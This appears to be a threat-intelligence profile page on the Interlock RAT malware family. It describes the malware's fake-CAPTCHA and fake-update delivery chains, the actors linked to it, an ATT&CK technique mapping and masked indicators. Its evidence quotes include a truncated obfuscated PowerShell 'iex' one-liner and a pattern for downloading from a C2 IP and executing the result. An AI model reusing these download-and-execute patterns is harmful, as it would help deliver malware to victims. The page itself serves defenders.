MalwareRansomwareUsed by 2 actors

Interlock RAT

Interlock RAT is a stealthy, modular remote access trojan/backdoor first observed in mid-to-late 2024 and primarily associated with the Interlock ransomware ecosystem. Reporting describes it as a lightweight binary with encrypted command-and-control communications and a plugin-based architecture that allows operators to add capabilities after compromise. Its documented functions include unauthorized remote control, system reconnaissance, data exfiltration, collection of system details, network mapping, and enabling lateral movement via RDP. Related reporting also describes a broader Interlock/NodeSnake framework with implementations in PowerShell, PHP, C/C++, Java, and JavaScript for Windows and Linux, capable of fetching commands to launch a SOCKS5 proxy tunnel, spawn a reverse shell, and deliver additional payloads including Interlock ransomware and Slopoly.

Observed delivery vectors include phishing, being dropped by other malware, fake browser update chains from compromised legitimate websites impersonating Google Chrome or Microsoft Edge installers, and ClickFix/FileFix-style social engineering. In one reported KongTuke-linked campaign, compromised websites displayed fake CAPTCHA prompts that instructed users to paste attacker-provided text into the Windows Run dialog; the resulting PowerShell installed a PHP variant of Interlock RAT. That variant reportedly used Cloudflare Tunnel URLs for stealthy C2, stored itself as php.exe under AppData for persistence, collected system information, mapped networks, and supported lateral movement via RDP. Public reporting also ties Interlock RAT distribution to the KongTuke/TAG-124 traffic distribution system, which has delivered Interlock RAT variants as downstream payloads.

Interlock RAT is closely associated with the Interlock ransomware group and with activity tracked by IBM X-Force as Hive0163. Content also notes overlap in reporting that groups Interlock RAT with NodeSnake, and states NodeSnake is designed to run shell commands, establish persistence, and retrieve and launch Interlock RAT. High-confidence behavioral references in the provided content include persistence establishment, outbound C2 communications, PowerShell-based staging, fake CAPTCHA/FileFix infection chains, Cloudflare Tunnel-based C2 in at least one PHP variant, storage as php.exe in AppData, and use in intrusion chains that ultimately lead to ransomware deployment.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Hive0163

The framework has multiple implementations in PowerShell, PHP, C/C++, Java, and JavaScript to support both Windows and Linux. Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads, such as Interlock ransomware and Slopoly.

via the hacker newsthehackernews.com

KongTuke

...used a technique called FileFix to spread a PHP variant of Interlock RAT...

via scworldscworld.com

MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques

T1189Drive-by CompromiseEvidence1

Interlock employs a multi-stage attack chain, starting by compromising legitimate websites that deliver fake browser updates, such as Google Chrome or MS Edge installers.

T1566PhishingEvidence1

The malware typically arrives via phishing campaigns or is dropped by other malware strains.

Execution

4 techniques

T1059Command and Scripting InterpreterEvidence1

Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads.

T1059.001PowerShellEvidence2

powershell.exe -ep bypass -c iex (-join [char[]]@(10,105,119,114,...))

T1204.003Malicious ImageEvidence1

The victim pastes and runs the command, which downloads and executes a second-stage payload.

T1559Inter-Process CommunicationEvidence1

Annotations ID Technique Tactic T1559 Inter-Process Communication Execution

Stealth

1 technique

T1036MasqueradingEvidence2

Executables Or Script Creation In Temp Path ... T1036

Discovery

1 technique

T1082System Information DiscoveryEvidence1

Interlock RAT is a stealthy and modular backdoor primarily used for unauthorized remote control, data exfiltration, and system reconnaissance.

Command and Control

4 techniques

T1071Application Layer ProtocolEvidence2

C2 Servers (payload delivery)... port 3456 is consistent across the fleet... Additional C2s... TLSv1.0 encrypted C2... TCP backdoor.

T1090ProxyEvidence1

Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads.

T1090.003Multi-hop ProxyEvidence1

"...allow it to launch a SOCKS5 proxy tunnel..."

T1105Ingress Tool TransferEvidence2

All samples download from http://<C2_IP>:3456/<single_letter>... The payload is saved to %APPDATA%\script.ps1, executed, then self-deleted.

INDICATORS OF COMPROMISE

IOCs tracked for this family

49 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

47 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other

2 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

uri●●●●●●●●●●●●View more in app4 days ago

domain●●●●●●●●●●●●View more in app3 months ago

ACTIVITY FEED

Recent activity

12 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

12 SOURCESView more in app

splunk researchNews

Mar 23, 2026

Detection: CHCP Command Execution | Splunk Security Content

Associated Analytic Story Azorult Crypto Stealer Forest Blizzard IcedID Interlock Rat Quasar RAT

the hacker newsNews

Mar 12, 2026

Hive0163 Uses AI-Assisted Slopoly Malware for Persistent Access in Ransomware Attacks

Cross-platform remote access trojan/framework that communicates with a remote server to fetch commands, launch a SOCKS5 proxy tunnel, spawn a reverse shell, and deliver additional payloads including Interlock ransomware and Slopoly.

breakglass intelNews

Mar 12, 2026

KongTuke Investigation Report - Breakglass Intelligence - Breakglass Intelligence

A RAT variant delivered as a final payload in KongTuke campaigns and linked in reporting to Interlock activity.

splunk researchNews

Feb 25, 2026

Detection: CHCP Command Execution | Splunk Security Content

Associated Analytic Story Azorult Crypto Stealer Forest Blizzard IcedID Interlock Rat Quasar RAT

+8 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching49

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping12

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.